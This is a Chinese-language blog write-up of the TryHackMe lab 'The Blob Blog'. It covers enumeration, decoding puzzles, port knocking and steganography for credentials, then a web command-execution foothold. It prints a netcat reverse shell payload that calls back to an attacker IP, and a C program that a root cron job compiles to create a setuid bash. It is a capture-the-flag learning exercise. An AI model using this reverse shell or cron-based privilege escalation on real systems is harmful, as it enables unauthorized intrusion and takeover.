The Blob Blog
你能把盒子扎根吗?
比赛比完了,结果还可以,满意。当然这一切也少不了TryHackMe的功劳,thm中等难度的房间我自认为打的差不多了,准备回去复习红队,然后挑战大boss, hololive域渗透
端口扫描
循例 nmap
Web枚举
进入80,发现是apache默认页面
查看页面源代码,发现一串长得跟base64一样的字符串
Cyberchef解码,见面很多次了,brainfuck
在线解码
这段话非常明显,暗示我们去端口敲门
使用nc一句话
nmap再扫一次,可以看到多了好几个端口
在同样的地方,页面源代码下面还有一句话
cyberchef解码,发现是base58
在445端口下的http,主页也是默认页面,但页面源代码给出了一组明文凭据
先到8080端口再看看
也是apache默认页面,扫一下
是一个登录页面,先尝试刚刚获得的凭据
似乎登录不进去
FTP枚举
使用刚刚获得的第二组凭据,登录ftp
有个jpeg,下载
steghide,使用刚刚获得的第一组凭据,成功提取一个.txt
查看out.txt, 又提供了一组凭据和一个疑似web中的路径
这组凭据无法登录ftp、ssh
Web枚举 - 2
跟着指引,查看刚刚获得的目录路径
很显然,这引导我们去刚刚的blog,并且使用刚刚获得的zcv的凭据登录
但是登录依然失败
为了节省时间看一眼wp,这个凭据是经过vigenere加密
成功登录进来
Reverse Shell
当我尝试whoami的时候,再查看review,会发现它执行了这个命令
那就直接尝试反向shell,payload:
mkfifo /tmp/f1;nc 10.9.62.153 8888 < /tmp/f1 | /bin/bash > /tmp/f1
getshell
横向移动
就当我在到处寻找有用的信息的时候,突然有一个疑似定时任务的消息出现在我的shell中
这使得我立即查看/etc/crontab
好吧,我们现在还没有权限进入bobloblaw
find suid,发现一个可疑的文件
当我使用ltrace的时候发现这么一句话
刚刚在web的blog页面上可以看到有1-6个,尝试一下之后成功移动过去
user flag
权限提升
虽然我们知道了cronjob有东西,但是.uh_oh文件夹我们依然没有权限访问
我想找到一直在shell弹出那句话的定时任务进程
这里传个pspy64过去进行分析,发现这么一行信息
它以root权限运行,并且会定时的编译boring_file.c并执行,而恰好该文件我们所有
将该c文件传回攻击机
修改内容:
#include <stdio.h>
#include <stdlib.h>
int main() {
setuid(0);
setgid(0);
system("cp /bin/bash /tmp/bash;chmod +s /tmp/bash");
return 0;
}
将其base64
写入.boring_file.c
静等一会,它出现了
利用
getroot